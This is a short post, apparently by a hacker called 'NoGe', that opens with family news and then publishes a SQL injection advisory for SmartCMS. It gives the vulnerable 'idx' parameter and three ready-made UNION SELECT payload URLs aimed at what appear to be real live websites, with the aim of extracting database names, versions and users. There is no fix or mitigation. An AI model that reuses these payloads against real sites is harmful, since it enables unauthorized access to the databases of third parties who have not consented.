Hei you out there... :)
It's been a long time since my last post..
Well i've been busy with many things and i have a daughter now (6 month). Very beautiful and smart daughter (like her father of course! hahahaha..). We call her "amora". :D
[o] SmartCMS <= SQL Injection Vulnerability
Software : SmartMS
Version : n/a
Vendor : http://smartcms.nl/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/index.php?idx=[SQLi]
[o] PoC
http://www.smartcms.nl/cms2/sites/1010/index.php?idx=566+AND+1=2+UNION+ALL+SELECT+database()--
http://www.pokey.nl/cms2/sites/1086/index.php?idx=3397+AND+1=2+UNION+ALL+SELECT+version()--
http://www.devriesenrijke.nl/cms2/sites/1077/index.php?idx=2605+AND+1=2+UNION+ALL+SELECT+user()--
Comments
basicnya jg gpp :(